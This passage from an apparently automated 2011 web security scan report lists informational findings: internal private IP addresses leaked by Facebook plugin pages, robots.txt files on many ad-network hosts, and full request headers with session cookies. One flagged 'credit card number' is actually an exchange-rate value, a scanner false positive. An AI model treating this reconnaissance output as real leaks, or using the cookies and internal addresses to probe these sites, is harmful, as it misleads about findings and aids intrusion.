User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.981. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.225.48

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.982. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.54

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.983. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.233.35

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.984. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.138.25

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.985. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.185.58

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.986. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.216.36

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.987. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.121.37

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.988. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.22.39

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.989. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.38.56

Request

GET /plugins/recommendations.php?site=cnbc.com&width=350&height=350&header=true&colorscheme=light&font=arial HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.990. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.172.33

Request

Response

19.991. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.25.22

Request

Response

20. Credit card numbers disclosed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://online.wsj.com
Path:	/internal/marketData.json

Issue detail

The following credit card number was disclosed in the response:

4821500000000016

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

Request

GET /internal/marketData.json?dojo.preventCache=1308223340480 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; s_dbfe=1305367748766; __utmz=1.1305367794.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1748330365.1305367794.1305373038.1306496231.3; s_vnum=1310602431737%26vn%3D1; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2207%22%2C%22high%22%3A%5B%2273%22%5D%2C%22low%22%3A%5B%2259%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DTue%2C%2014%20Jun%202011%2000%3A33%3A55%20GMT%7C%7CweatherCode%3D10005; _chartbeat2=wh4hk9xmdxztvs8m; rsi_csl=lDlIlPlQlA; rsi_segs=G07608_10004|G07608_10009|G07608_10016|G07608_10017|G07608_10001; DJSESSION=continent%3dna%7c%7czip%3d20001%2d20020%7c%7ccountry%3dus%7c%7cregion%3ddc%7c%7cORCS%3dna%2cus%7c%7ccity%3dwashington%7c%7clongitude%3d%2d77.0369%7c%7ctimezone%3dest%7c%7clatitude%3d38.8951; wsjregion=na%2cus

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 11:22:20 GMT
Server: Apache
Last-Modified: Thu, 16 Jun 2011 11:22:20 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 43297
Content-Type: application/json

[{"Key":"US:USDCNY","Value":{"BarFactor":300000,"BarSize":5,"CustomDateRange":false,"Data":[{"Key":"US:USDCNY","Value":{"BlueGrassChannel":"\/quotes\/zigman\/4869230\/sampled","IsIndex":0,"Name":"CNY\/USD","Sessions":[{"High":{"Index":111,"Price":6.48555},"Low":{"Index":131,"Price":6.47655},"News":null,"PreviousClose":6.4821500000000016,"Regions":[{"Start":0,"Stop":0,"Type":0},{"Start":0,"Stop":0,"Type":1}],"Start":"\/Date(1308189600000-0500)\/","Stop":"\/Date(1308275940000-0500)\/","Trades":[null,null,null,null,null,null,null,null,n
...[SNIP]...

21. Robots.txt file previous next
There are 97 instances of this issue:

http://a.rfihub.com/sed
http://a.tribalfusion.com/j.ad
http://a1.sndcdn.com/stylesheets/special.css
http://ad.burstdirectads.com/unpixel
http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber
http://ad.yieldmanager.com/pixel
http://ads.bluelithium.com/st
http://ads.pointroll.com/PortalServe/
http://ads.undertone.com/ajs.php
http://adserver.adtechus.com/bind
http://adsfac.us/ag.asp
http://adx.g.doubleclick.net/pagead/adview
http://altfarm.mediaplex.com/ad/js/17038-128465-5934-2
http://am.nexac.com/match
http://amch.questionmarket.com/adscgen/st.php
http://api.bizographics.com/v1/profile.json
http://b.scorecardresearch.com/b
http://b.voicefive.com/b2
http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.betrad.com/a/n/273/1153.js
http://c7.zedo.com/img/bh.gif
http://cache.specificmedia.com/creative/blank.gif
http://cas.criteo.com/delivery/afr.php
http://cctrkom.creditcards.com/b/ss/ccardsccdc-us/1/H.17/s93293816028162
http://cdn.krxd.net/config/
http://cdn.turn.com/server/ddc.htm
http://cdn5.tribalfusion.com/media/1956006/frame.html
http://check4.facebook.com/ajax/v6.php
http://check6.facebook.com/ajax/v6.php
http://cheetah.vizu.com/i.gif
http://citi.bridgetrack.com/usc/_spredir.htm
http://click.linksynergy.com/fs-bin/click
http://clickserve.cc-dt.com/link/click
http://cm.g.doubleclick.net/pixel
http://commerce.wsj.com/auth/forgotpass
http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm
http://d7.zedo.com/img/bh.gif
http://dar.youknowbest.com/
http://dis.ny.us.criteo.com/dis/dis.aspx
http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js
http://ev.ib-ibi.com/image.sbix
http://feeds.bbci.co.uk/news/rss.xml
http://fls.doubleclick.net/activityi
http://gan.doubleclick.net/gan_impression
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1049525132/
http://homedepot.ugc.bazaarvoice.com/static/1999q/r_5_ispacer.gif
http://img.mediaplex.com/content/0/17038/128465/Volcom___RCVA_300x250_Unisex_NA.js
http://imp.constantcontact.com/imp/cmp.jsp
http://l.addthiscdn.com/live/t00/250lo.gif
http://login.dotomi.com/ucm/UCMController
http://media2.legacy.com/bind
http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s95367101319134
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://oc.creditcards.com/trans_node.php
http://oimg.nbcuni.com/b/ss/nbcuglobal,%20nbcucnbcd,%20nbcucnbcbu/1/H.2-pdv-2/s18412435774225
http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s19508665378671
http://online.wsj.com/djscript/latest/dijit/nls/loading.js
http://p.addthis.com/pixel
http://p.opt.fimserve.com/bht/
http://pagead2.googlesyndication.com/pagead/imgad
http://pbid.pro-market.net/engine
http://pixel.everesttech.net/1688/i
http://pixel.invitemedia.com/admeld_sync
http://pixel.quantserve.com/pixel
http://puma.vizu.com/cdn/00/00/20/73/smart_tag.js
http://r.turn.com/r/beacon
http://rd.rlcdn.com/rd
http://reviews.homedepot.com/1999q/202642971/reviews.htm
http://rmd.atdmt.com/tl/DEDENACCEACE/012f5850bb5d4d1c8cbf7566089f1db6/95c1b6c96f2e40f38e53ff93b84b6cd9012f5850bb5d4d1c8cbf7566089f1db6.js
http://rover.ebay.com/ar/1/76417/4
http://rt.legolas-media.com/lgrt
http://script.footprintlive.com/
http://segment-pixel.invitemedia.com/pixel
http://services.krxd.net/geoip
http://soundcloud.com/
https://soundcloud.com/login
http://spe.atdmt.com/ds/DEDENACCEACE/Accenture_Image_FY11_Video/us_shark_flash_728x90_8k_v1.gif
http://spotlight.creditcards.com/www/delivery/ajs.php
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://sync.mathtag.com/sync
http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf
http://tf.nexac.com/media/1809966/na.html
http://va.px.invitemedia.com/pixel
http://wasc.homedepot.com/b/ss/homedepot/1/H.22.1/s15011168408673
http://www.bizographics.com/collect/
http://www.cnbc.com/redirect.aspx
http://www.creditcards.com/__ssard.png
http://www.facebook.com/widgets/recommendations.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1049525132/
http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation
http://www.ilslaunch.com/modules/node/node.css
http://www.inlandbusinesslaw.com/
http://www.lightsquared.com/
http://www.res-x.com/ws/r2/Resonance.aspx
http://www.wunderground.com/dotset.php

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

21.1. http://a.rfihub.com/sed previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.rfihub.com
Path:	/sed

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.rfihub.com

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain;charset=ISO-8859-1
Content-Length: 26

User-agent: *
Disallow: /

21.2. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

21.3. http://a1.sndcdn.com/stylesheets/special.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1.sndcdn.com
Path:	/stylesheets/special.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a1.sndcdn.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
X-Cacheable: YES
Content-Length: 26
X-Varnish: 2567063418 515095317
Cache-Control: max-age=310436944
Expires: Sat, 17 Apr 2021 19:56:41 GMT
Date: Thu, 16 Jun 2011 19:27:37 GMT
Connection: close

User-agent: *
Disallow: /

21.4. http://ad.burstdirectads.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.burstdirectads.com
Path:	/unpixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.burstdirectads.com

Response

HTTP/1.0 200 OK
Date: Thu, 16 Jun 2011 13:08:18 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:08:18 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

21.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 16 Jun 2011 11:22:22 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

21.6. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Thu, 16 Jun 2011 11:28:24 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 11:28:24 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

21.7. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.bluelithium.com

Response

HTTP/1.0 200 OK
Date: Thu, 16 Jun 2011 13:08:45 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 13:08:45 GMT
Pragma: no-cache
Content-Length: 26
Content-Type: text/plain
Age: 0

User-agent: *
Disallow: /

21.8. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:13a4"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Thu, 16 Jun 2011 13:13:13 GMT
Connection: close

User-agent: *
Disallow: /

21.9. http://ads.undertone.com/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.undertone.com
Path:	/ajs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ads.undertone.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 09 Jun 2011 22:26:04 GMT
ETag: "52000d-1a-4a54ef0461700"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Thu, 16 Jun 2011 12:07:42 GMT
Connection: close

User-agent: *
Disallow: /

21.10. http://adserver.adtechus.com/bind previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adserver.adtechus.com
Path:	/bind

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adserver.adtechus.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

21.11. http://adsfac.us/ag.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adsfac.us
Path:	/ag.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adsfac.us

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 30 Sep 2008 00:31:21 GMT
Accept-Ranges: bytes
ETag: "e5e89cdc9322c91:0"
Server: Microsoft-IIS/7.0
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Date: Thu, 16 Jun 2011 17:25:14 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

21.12. http://adx.g.doubleclick.net/pagead/adview previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://adx.g.doubleclick.net
Path:	/pagead/adview

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 17 Jun 2011 10:11:55 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

21.13. http://altfarm.mediaplex.com/ad/js/17038-128465-5934-2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17038-128465-5934-2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 16 Jun 2011 12:10:56 GMT
Connection: keep-alive

User-agent: *
Disallow: /

21.14. http://am.nexac.com/match previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://am.nexac.com
Path:	/match

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: am.nexac.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:11:18 GMT
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 10 Jun 2011 18:11:42 GMT
ETag: "65b381-1a-4a55f806dd380"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

21.15. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: amch.questionmarket.com

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:53:19 GMT
Server: Apache/2.2.3
Last-Modified: Tue, 28 Mar 2006 15:45:05 GMT
ETag: "e0610677-1a-4100ff999c240"
Accept-Ranges: bytes
Content-Length: 26
Keep-Alive: timeout=5, max=962
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /

21.16. http://api.bizographics.com/v1/profile.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.bizographics.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:22 GMT
